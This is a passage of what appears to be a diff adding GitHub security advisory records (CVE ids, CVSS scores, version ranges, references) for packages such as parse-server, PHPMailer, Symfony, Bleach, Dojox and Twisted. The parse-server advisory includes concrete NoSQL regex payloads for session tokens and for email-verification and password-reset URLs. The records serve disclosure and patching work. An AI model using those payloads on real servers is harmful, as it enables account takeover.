+Upgrade to versions 6.0.3 or later.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'kind-of'}, 'ecosystem_specific': {'affected_functions': ['kind-of.ctorName']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-20149'}, {'type': 'WEB', 'url': 'https://github.com/jonschlinkert/kind-of/issues/30'}, {'type': 'WEB', 'url': 'https://github.com/jonschlinkert/kind-of/pull/31'}, {'type': 'WEB', 'url': 'https://github.com/jonschlinkert/kind-of/commit/1df992ce6d5a1292048e5fe9c52c5382f941ee0b'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-KINDOF-537849'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1490'}]","{'cwe_ids': ['CWE-668'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-03-31T15:59:30Z', 'nvd_published_at': None}"
+1.4.0,GHSA-8867-vpm3-g98g,2021-08-19T21:46:51Z,2020-03-10T20:56:41Z,,['CVE-2012-5578'],Incorrect Default Permissions in keyring,Python keyring has insecure permissions on new databases allowing world-readable files to be created,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'keyring'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.10'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2012-5578'}, {'type': 'WEB', 'url': 'https://access.redhat.com/security/cve/cve-2012-5578'}, {'type': 'WEB', 'url': 'https://bugs.launchpad.net/ubuntu/+source/python-keyring/+bug/1031465'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2012-5578'}, {'type': 'WEB', 'url': 'https://bugzilla.suse.com/show_bug.cgi?id=CVE-2012-5578'}, {'type': 'WEB', 'url': 'https://github.com/jaraco/keyring/blob/master/CHANGES.rst#010'}, {'type': 'WEB', 'url': 'https://security-tracker.debian.org/tracker/CVE-2012-5578'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2012/11/27/4'}]","{'cwe_ids': ['CWE-276'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-03-10T20:56:29Z', 'nvd_published_at': None}"
+1.4.0,GHSA-mcx4-f5f5-4859,2021-01-08T20:25:26Z,2020-03-30T20:09:16Z,,['CVE-2020-5255'],Prevent cache poisoning via a Response Content-Type header in Symfony,"Description
+-----------
+
+When a `Response` does not contain a `Content-Type` header, Symfony falls back to the format defined in the `Accept` header of the request, leading to a possible mismatch between the response's content and `Content-Type` header. When the response is cached, this can lead to a corrupted cache where the cached format is not the right one.
+
+Resolution
+----------
+
+Symfony does not use the `Accept` header anymore to guess the `Content-Type`.
+
+The patch for this issue is available [here](https://github.com/symfony/symfony/commit/dca343442e6a954f96a2609e7b4e9c21ed6d74e6) for the 4.4 branch.
+
+Credits
+-------
+
+I would like to thank Xavier Lacot from JoliCode for reporting & Yonel Ceruto and Tobias Schultze for fixing the issue.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'symfony/http-foundation'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.4.0'}, {'fixed': '4.4.7'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'symfony/http-foundation'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '5.0.7'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/symfony/symfony/security/advisories/GHSA-mcx4-f5f5-4859'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-5255'}, {'type': 'WEB', 'url': 'https://github.com/symfony/symfony/commit/dca343442e6a954f96a2609e7b4e9c21ed6d74e6'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/C36JLPHUPKDFAX6D5WYFC4ALO2K7RDUQ/'}, {'type': 'WEB', 'url': 'https://symfony.com/blog/cve-2020-5255-prevent-cache-poisoning-via-a-response-content-type-header'}]","{'cwe_ids': ['CWE-435'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2020-03-30T19:28:58Z', 'nvd_published_at': None}"
+1.4.0,GHSA-m884-279h-32v2,2021-05-12T23:54:24Z,2020-03-30T20:09:31Z,,['CVE-2020-5274'],Exceptions displayed in non-debug configurations in Symfony,"Description
+-----------
+
+When `ErrorHandler` renders an exception HTML page, it uses un-escaped properties from the related Exception class to render the stacktrace. The security issue comes from the fact that the stacktraces were also displayed in non-`debug` environments.
+
+Resolution
+----------
+
+The `ErrorHandler` class now escapes all properties coming from the related Exception, and the stacktrace is not displayed anymore in non-`debug` environments.
+
+The patches for this issue are available [here](https://github.com/symfony/symfony/commit/cf80224589ac05402d4f72f5ddf80900ec94d5ad) and [here](https://github.com/symfony/symfony/commit/629d21b800a15dc649fb0ae9ed7cd9211e7e45db) for branch 4.4.
+
+Credits
+-------
+
+I would like to thank Luka Sikic for reporting & Yonel Ceruto and Jérémy Derussé for fixing the issue.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'symfony/http-foundation'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.4.0'}, {'fixed': '4.4.4'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'symfony/http-foundation'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '5.0.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/symfony/symfony/security/advisories/GHSA-m884-279h-32v2'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-5274'}, {'type': 'WEB', 'url': 'https://github.com/symfony/symfony/commit/629d21b800a15dc649fb0ae9ed7cd9211e7e45db'}, {'type': 'WEB', 'url': 'https://github.com/symfony/symfony/commit/cf80224589ac05402d4f72f5ddf80900ec94d5ad'}]","{'cwe_ids': ['CWE-209'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-03-30T19:36:11Z', 'nvd_published_at': None}"
+1.4.0,GHSA-754x-4jwp-cqp6,2023-09-11T21:38:46Z,2020-03-31T17:02:26Z,,['CVE-2019-15600'],Cross-Site Scripting in http_server,"All versions of `http_server` are vulnerable to Cross-Site Scripting (XSS). The package fails to sanitize filenames, allowing attackers to execute arbitrary JavaScript in the victim's browser through files with names containing malicious code.
+
+
+## Recommendation
+
+No fix is currently available. Consider using an alternative package until a fix is made available.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'http_server'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.0.12'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-15600'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/578138'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/692262'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1170'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-03-31T15:39:05Z', 'nvd_published_at': None}"
+1.4.0,GHSA-7w4p-72j7-v7c2,2021-08-19T19:57:58Z,2020-03-05T22:08:55Z,,['CVE-2018-19296'],Phar object injection in PHPMailer,"PHPMailer versions prior to 6.0.6 and 5.2.27 are vulnerable to an object injection attack by passing phar:// paths into `addAttachment()` and other functions that may receive unfiltered local paths, possibly leading to RCE. See [this article](https://knasmueller.net/5-answers-about-php-phar-exploitation) for more info on this type of vulnerability. Mitigated by blocking the use of paths containing URL-protocol style prefixes such as `phar://`. Reported by Sehun Oh of cyberone.kr.
+
+### Impact
+Object injection, possible remote code execution
+
+### Patches
+Fixed in 6.0.6 and 5.2.27
+
+### Workarounds
+Validate and sanitise user input before using.
+
+### References
+https://nvd.nist.gov/vuln/detail/CVE-2018-19296
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open a private issue in [the PHPMailer project](https://github.com/PHPMailer/PHPMailer)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'phpmailer/phpmailer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '5.2.27'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'phpmailer/phpmailer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.6'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/PHPMailer/PHPMailer/security/advisories/GHSA-7w4p-72j7-v7c2'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2018-19296'}, {'type': 'WEB', 'url': 'https://github.com/FriendsOfPHP/security-advisories/blob/master/phpmailer/phpmailer/CVE-2018-19296.yaml'}, {'type': 'WEB', 'url': 'https://github.com/PHPMailer/PHPMailer/releases/tag/v5.2.27'}, {'type': 'WEB', 'url': 'https://github.com/PHPMailer/PHPMailer/releases/tag/v6.0.6'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2018/12/msg00020.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3B5WDPGUFNPG4NAZ6G4BZX43BKLAVA5B/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KPU66INRFY5BQ3ESVPRUXJR4DXQAFJVT/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2018/dsa-4351'}]","{'cwe_ids': ['CWE-502', 'CWE-915'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-03-05T22:08:10Z', 'nvd_published_at': '2018-11-16T09:29:00Z'}"
+1.4.0,GHSA-vqhp-cxgc-6wmm,2023-02-17T00:33:59Z,2020-03-30T19:45:56Z,,['CVE-2020-6817'],regular expression denial-of-service (ReDoS) in Bleach,"### Impact
+
+`bleach.clean` behavior parsing style attributes could result in a regular expression denial of service (ReDoS).
+
+Calls to ``bleach.clean`` with an allowed tag with an allowed ``style`` attribute are vulnerable to ReDoS. For example, ``bleach.clean(..., attributes={'a': ['style']})``.
+
+### Patches
+
+3.1.4
+
+### Workarounds
+
+* do not whitelist the style attribute in `bleach.clean` calls
+
+* limit input string length
+
+### References
+
+* https://bugzilla.mozilla.org/show_bug.cgi?id=1623633
+* https://www.regular-expressions.info/redos.html
+* https://blog.r2c.dev/posts/finding-python-redos-bugs-at-scale-using-dlint-and-r2c/
+* https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6817
+
+### Credits
+
+* Reported by schwag09 of r2c
+
+### For more information
+If you have any questions or comments about this advisory:
+
+* Open an issue at https://github.com/mozilla/bleach/issues
+* Email us at security@mozilla.org","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'bleach'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.1.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/mozilla/bleach/security/advisories/GHSA-vqhp-cxgc-6wmm'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-6817'}, {'type': 'WEB', 'url': 'https://bugzilla.mozilla.org/show_bug.cgi?id=1623633'}, {'type': 'WEB', 'url': 'https://github.com/mozilla/bleach/releases/tag/v3.1.4'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-PYTHON-BLEACH-561754'}]","{'cwe_ids': ['CWE-1333', 'CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-03-27T19:58:38Z', 'nvd_published_at': '2023-02-16T22:15:00Z'}"
+1.4.0,GHSA-h4mf-75hf-67w4,2021-01-08T20:27:29Z,2020-03-04T20:20:27Z,,['CVE-2020-5251'],Information disclosure in parse-server,"1. you can fetch all the users' objects, by using regex in the NoSQL query.
+Using the NoSQL, you can use a regex on sessionToken `(""_SessionToken"":{""$regex"":""r:027f""}}` and find valid accounts this way.
+
+Using this method, it's possible to retrieve accounts without interaction from the users.
+
+GET /parse/users/me HTTP/1.1
+```
+{
+ ""_ApplicationId"": ""appName"",
+ ""_JavaScriptKey"": ""javascriptkey"",
+ ""_ClientVersion"": ""js2.10.0"",
+ ""_InstallationId"": ""ca713ee2-6e60-d023-a8fe-14e1bfb2f300"",
+ ""_SessionToken"": {
+ ""$regex"": ""r:5""
+ }
+}
+```
+When trying it with an update query the same thing luckily doesn't seem to work:
+POST /parse/classes/_User/PPNk59jPPZ
+
+2. There is another similar vulnerability in verify email and the request password reset.
+
+If you sign up with someone else's email address, you can simply use regex in the token param to verify the account: `http://localhost:1337/parse/apps/kickbox/verify_email?token[$regex]=a&username=some@email.com`
+
+The same thing can be done for reset password: `http://localhost:1337/parse/apps/kickbox/request_password_reset?token[$regex]=a&username=some@email.com`
+
+You may need to do it a few times with a different letter/number, but as long as the tokens contain the character it will succeed.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'parse-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.1.0'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.0.0'}}]","[{'type': 'WEB', 'url': 'https://github.com/parse-community/parse-server/security/advisories/GHSA-h4mf-75hf-67w4'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-5251'}, {'type': 'WEB', 'url': 'https://github.com/parse-community/parse-server/commit/3a3a5eee5ffa48da1352423312cb767de14de269'}]","{'cwe_ids': ['CWE-200', 'CWE-285'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-03-04T19:54:37Z', 'nvd_published_at': None}"
+1.4.0,GHSA-p86x-652p-6385,2021-08-19T21:56:09Z,2020-03-11T21:36:38Z,,['CVE-2012-5577'],Incorrect Default Permissions in keyring,Python keyring lib before 0.10 created keyring files with world-readable permissions.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'keyring'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.10'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2012-5577'}, {'type': 'WEB', 'url': 'https://bitbucket.org/kang/python-keyring-lib/commits/049cd181470f1ee6c540e1d64acf1def7b1de0c1'}, {'type': 'WEB', 'url': 'https://bitbucket.org/kang/python-keyring-lib/issue/67/set-go-rwx-on-keyring_passcfg'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2012-5577'}, {'type': 'WEB', 'url': 'https://security-tracker.debian.org/tracker/CVE-2012-5577'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2012/11/27/3'}]","{'cwe_ids': ['CWE-276'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-03-11T21:36:23Z', 'nvd_published_at': None}"
+1.4.0,GHSA-p94w-42g3-f7h4,2020-02-28T16:38:09Z,2020-03-06T01:16:00Z,,[],Holder can (re)create authentic credentials after receiving a credential in vp-toolkit,"### Impact
+The [`verifyVerifiableCredential()`](https://github.com/rabobank-blockchain/vp-toolkit/blob/master/src/service/signers/verifiable-credential-signer.ts#L57) method check the cryptographic integrity of the Verifiable Credential, but it does not check if the [`credential.issuer`](https://github.com/rabobank-blockchain/vp-toolkit-models/blob/develop/src/model/verifiable-credential.ts#L129) DID matches the signer of the credential.
+
+The **verifier** is impacted by this vulnerability.
+
+### Patches
+Patch will be available in version 0.2.2.
+
+### Workarounds
+In case you trust certain issuers for certain credentials as a verifier, trust the issuer's public key from the `credential.proof.verificationMethod` field.
+
+### References
+[Github issue](https://github.com/rabobank-blockchain/vp-toolkit/issues/13)
+
+### For more information
+If you have any questions or comments about this advisory:
+* Discuss in the existing [issue](https://github.com/rabobank-blockchain/vp-toolkit/issues/13)
+* [Contact me](https://github.com/rabomarnix)",[],"[{'package': {'ecosystem': 'npm', 'name': 'vp-toolkit'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.2.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/rabobank-blockchain/vp-toolkit/security/advisories/GHSA-p94w-42g3-f7h4'}, {'type': 'WEB', 'url': 'https://github.com/rabobank-blockchain/vp-toolkit/issues/13'}, {'type': 'WEB', 'url': 'https://github.com/rabobank-blockchain/vp-toolkit/commit/6315936d1d7913fd116fa51a0dbbd29d82c0ce17'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-02-28T16:38:09Z', 'nvd_published_at': None}"
+1.4.0,GHSA-3hw5-q855-g6cw,2021-02-18T19:45:35Z,2020-03-10T18:03:32Z,,['CVE-2020-5259'],Prototype Pollution in Dojox,"The Dojox jQuery wrapper `jqMix` mixin method is vulnerable to Prototype Pollution.
+
+Affected Area:
+```
+//https://github.com/dojo/dojox/blob/master/jq.js#L442
+ var tobj = {};
+ for(var x in props){
+ // the ""tobj"" condition avoid copying properties in ""props""
+ // inherited from Object.prototype. For example, if obj has a custom
+ // toString() method, don't overwrite it with the toString() method
+ // that props inherited from Object.prototype
+ if((tobj[x] === undefined || tobj[x] != props[x]) && props[x] !== undefined && obj != props[x]){
+ if(dojo.isObject(obj[x]) && dojo.isObject(props[x])){
+ if(dojo.isArray(props[x])){
+ obj[x] = props[x];
+ }else{
+ obj[x] = jqMix(obj[x], props[x]);
+ }
+ }else{
+ obj[x] = props[x];
+ }
+```","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'dojox'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.10'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'dojox'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.12.0'}, {'fixed': '1.12.8'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'dojox'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.13.0'}, {'fixed': '1.13.7'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'dojox'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.14.0'}, {'fixed': '1.14.6'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'dojox'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.15.0'}, {'fixed': '1.15.3'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'dojox'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.16.0'}, {'fixed': '1.16.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/dojo/dojox/security/advisories/GHSA-3hw5-q855-g6cw'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-5259'}, {'type': 'WEB', 'url': 'https://github.com/dojo/dojox/commit/47d1b302b5b23d94e875b77b9b9a8c4f5622c9da'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2020/03/msg00012.html'}]","{'cwe_ids': ['CWE-94'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2020-03-10T18:02:07Z', 'nvd_published_at': None}"
+1.4.0,GHSA-gww7-p5w4-wrfv,2023-09-14T15:06:09Z,2020-03-04T20:52:11Z,,['CVE-2019-20330'],Deserialization of Untrusted Data in jackson-databind,"FasterXML jackson-databind 2.x before 2.6.7.4, 2.7.x before 2.7.9.7, 2.8.x before 2.8.11.5, and 2.9.x before 2.9.10.2 lacks certain `net.sf.ehcache` blocking.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.fasterxml.jackson.core:jackson-databind'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.6.7.4'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.6.7.3'}}, {'package': {'ecosystem': 'Maven', 'name': 'com.fasterxml.jackson.core:jackson-databind'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.7.0'}, {'fixed': '2.7.9.7'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.7.9.6'}}, {'package': {'ecosystem': 'Maven', 'name': 'com.fasterxml.jackson.core:jackson-databind'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.8.0'}, {'fixed': '2.8.11.5'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.8.11.4'}}, {'package': {'ecosystem': 'Maven', 'name': 'com.fasterxml.jackson.core:jackson-databind'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.9.0'}, {'fixed': '2.9.10.2'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.9.10.1'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-20330'}, {'type': 'WEB', 'url': 'https://github.com/FasterXML/jackson-databind/issues/2526'}, {'type': 'PACKAGE', 'url': 'https://github.com/FasterXML/jackson-databind'}, {'type': 'WEB', 'url': 'https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.10.1...jackson-databind-2.9.10.2'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r107c8737db39ec9ec4f4e7147b249e29be79170b9ef4b80528105a2d@%3Cdev.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0@%3Cissues.bookkeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2c77dd6ab8344285bd8e481b57cf3029965a4b0036eefccef74cdd44@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r392099ed2757ff2e383b10440594e914d080511d7da1c8fed0612c1f@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r3f8180d0d25a7c6473ebb9714b0c1d19a73f455ae70d0c5fefc17e6c@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r428735963bee7cb99877b88d3228e28ec28af64646455c4f3e7a3c94@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r50f513772f12e1babf65c7c2b9c16425bac2d945351879e2e267517f@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r5c14fdcabdeaba258857bcb67198652e4dce1d33ddc590cd81d82393@%3Cdev.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r5c3644c97f0434d1ceb48ff48897a67bdbf3baf7efbe7d04625425b3@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r5d3d10fdf28110da3f9ac1b7d08d7e252f98d7d37ce0a6bd139a2e4f@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r67f4d4c48197454b83d62afbed8bebbda3764e6e3a6e26a848961764@%3Ccommits.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r707d23bb9ee245f50aa909add0da6e8d8f24719b1278ddd99d2428b2@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r7a0821b44247a1e6c6fe5f2943b90ebc4f80a8d1fb0aa9a8b29a59a2@%3Ccommits.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r7fb123e7dad49af5886cfec7135c0fd5b74e4c67af029e1dc91ba744@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8831b7fa5ca87a1cf23ee08d6dedb7877a964c1d2bd869af24056a63@%3Ccommits.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r909c822409a276ba04dc2ae31179b16f6864ba02c4f9911bdffebf95@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra2e572f568de8df5ba151e6aebb225a0629faaf0476bf7c7ed877af8@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra5ce96faec37c26b0aa15b4b6a8b1cbb145a748653e56ae83e9685d0@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra8a80dbc7319916946397823aec0d893d24713cbf7b5aee0e957298c@%3Cdev.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb532fed78d031fff477fd840b81946f6d1200f93a63698dae65aa528@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd1f346227e11fc515914f3a7b20d81543e51e5822ba71baa0452634a@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd49cfa41bbb71ef33b53736a6af2aa8ba88c2106e30f2a34902a87d2@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd6c6fef14944f3dcfb58d35f9317eb1c32a700e86c1b5231e45d3d0b@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rfa57d9c2a27d3af14c69607fb1a3da00e758b2092aa88eb6a51b6e99@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2020/02/msg00020.html'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20200127-0004/'}, {'type': 'WEB', 'url': 'https://www.oracle.com//security-alerts/cpujul2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2020.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2020.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2020.html'}]","{'cwe_ids': ['CWE-502'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-02-25T02:46:33Z', 'nvd_published_at': '2020-01-03T04:15:00Z'}"
+1.4.0,GHSA-p5xh-vx83-mxcj,2022-03-23T23:12:13Z,2020-03-31T15:40:12Z,,['CVE-2020-10109'],HTTP Request Smuggling in Twisted,"In Twisted Web through 20.3.0, there was an HTTP request splitting vulnerability. When presented with a content-length and a chunked encoding header, the content-length took precedence and the remainder of the request body was interpreted as a pipelined request.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'Twisted'}, 'ecosystem_specific': {'affected_functions': ['twisted.web.http.HTTPChannel', 'twisted.web.http.HTTPChannel.headerReceived']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '20.3.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-10109'}, {'type': 'WEB', 'url': 'https://github.com/twisted/twisted/commit/4a7d22e490bb8ff836892cc99a1f54b85ccb0281'}, {'type': 'PACKAGE', 'url': 'https://github.com/twisted/twisted'}, {'type': 'WEB', 'url': 'https://github.com/twisted/twisted/blob/6ff2c40e42416c83203422ff70dfc49d2681c8e2/NEWS.rst#twisted-2030-2020-03-13'}, {'type': 'WEB', 'url': 'https://know.bishopfox.com/advisories/twisted-version-19.10.0'}, {'type': 'WEB', 'url': 